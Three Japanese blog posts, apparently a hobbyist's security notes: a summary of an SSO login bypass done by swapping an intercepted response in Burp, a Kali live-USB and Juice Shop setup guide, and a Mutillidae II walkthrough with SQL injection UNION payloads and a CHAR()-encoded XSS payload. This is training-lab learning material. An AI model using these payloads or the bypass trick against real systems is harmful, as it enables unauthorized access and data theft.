Hello there, ('ω')ノ

SSOログインをバイパスする方法のストーリーを。

脆弱性：

　認証バイパス

記事：

　https://systemweakness.com/the-story-of-how-i-bypass-sso-login-6b93370196cf

常に最初のステップは、ターゲットページからドメインアドレス全体をコピーして。

bashスクリプトのtxtファイルに貼り付けることで。

詳細については、https://github.com/zer0da/subEnumを確認して。

bashが仕事をしている間、いつものように会社を調査し始めて。

彼らの仕事は何か、彼らが使用しているテクノロジーなど。

bashが仕事を終えた後、すべてのサブドメインが見つかり。

新しいtxtファイルに書き込まれたので。

その後、到達可能なサブドメインを解析するために、Pythonスクリプトを開始して。

詳細については、https://github.com/zer0da/SubCheckerから確認して。

次に、サブドメインをチェックして、異常なものを検出し始めて。

あるページで、そのページにはSSOログインが必要であることがわかったものの。

その前に、１ミリ秒の間その背後にある下記のページを見ることができて。

それはウェブサイトの論理的な問題だったと思うので。

Burpプロキシから調べ始めて。

まず、GETからPOST、TRACEなどのメソッドを変更して。

しかし、それはうまくいかなかったので。

Webサイトの別のパスを開き、200OKと到達可能を返す応答をコピーして。

SSOログインページの応答を傍受して。

その後、コピーした応答をこの応答に貼り付けて転送すると。

このページにアクセスできたので、バグが見つかって。

Best regards, (^^ゞ

Hello there, ('ω')ノ

今回は、KingstonのUSBで。

USBは、256GBのGen2対応を。

Kali LinuxのLive USBの作る際には。

下記よりliveバージョンをダウンロードしてから。

ダウンロードがなかなかできないときは、アーカイブサイトからダウンロードして。
　https://archive.kali.org/kali-images/kali-weekly/

それとUSBへの書き込みソフトとしてrufusが必要で。

　https://rufus.ie/ja/

書き込みの際は、保存領域のサイズを指定しないと保存できず。

複雑にLive USBのKali Linuxの作成方法を書かれている方がおられるようですが。

実はシンプルで簡単で。

Rufusを使って『保存領域のサイズ』を指定すれば簡単にできますので。

わざわざパーティションの作成は不要かと。

まずは、ブートの種類を選択してから。

USBからの起動する際は、BIOSでセキュアブートを無効する必要があって。

あとはBIOSを設定してUSBから起動して。

設定を保存するためには、Persistenceを選んで。

起動すると左上のアイコンからWiFiの設定をして。

メニューのSettingsのKeyboardからキーボードの設定を『Japanese』へ。

Use system defaultsをOFFにしてからAddで。

Englishは、Removeを。

ターミナルを開いて。

　sudo apt update

　sudo apt upgrade ⇦ 時間がかかるので後で実行するのがおすすめ

日本語環境は、いろいろありますが今回はこれを。

　sudo apt install  ibus-anthy

メニューからのibusの設定はこんな感じで。

AddからJapaneseを選択してから『Japanese-Anthy』を。

バーの右上の文字入力をクリックして、『Japanese-Anthy』を選択すると。

全角半角キーで切り替わるようになっているかと。

ただ、以前だと全角半角キーでの切り替えは、下記のようにiBusで。

ここでもキーボードのレイアウトを『ja』したいたりとも。

ここはバージョンの違いかもしれませんが、臨機応変に。

Chromeもインストールして。

sudo apt update
sudo wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo apt install ./google-chrome-stable_current_amd64.deb

USB Live版でもVirtual Boxを。

　sudo apt install virtualbox

Gen2対応のUSBで問題なく。

Juice Shopをインストールして。

sudo apt -y install nodejs
sudo apt -y install npm
sudo apt -y install git
git clone https://github.com/bkimminich/juice-shop.git
cd juice-shop
npm install
npm start ← CTRL+Cで終了
http://localhost:3000

Best regards, (^^ゞ

Hello there, ('ω')ノ

久しぶりのMutillidae Ⅱを。

こちらにはSQLインジェクションの脆弱性があって。

UNIONを使って、カラム数と表示されるカラムを特定して。

　' union select null,1,2,3,null,null,null -- 

　' union select null,@@version,schema(),system_user(),null,null,null -- 

次に数字を文字に変えてみるとエラーとなるため。

　' union select null,A,null,null,null,null,null -- 

下記のような関数を使用すると。

　' union select null,char(65),null,null,null,null,null -- 

下記のサイトで、ペイロードの文字列をASCIIに変換して。

http://web-apps.nbookmark.com/ascii-converter/

下記を実行するとXSSが機能して。

' union select null,CHAR(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,88,83,83,39,41,60,47,115,99,114,105,112,116,62),null,null,null,null,null -- 

Best regards, (^^ゞ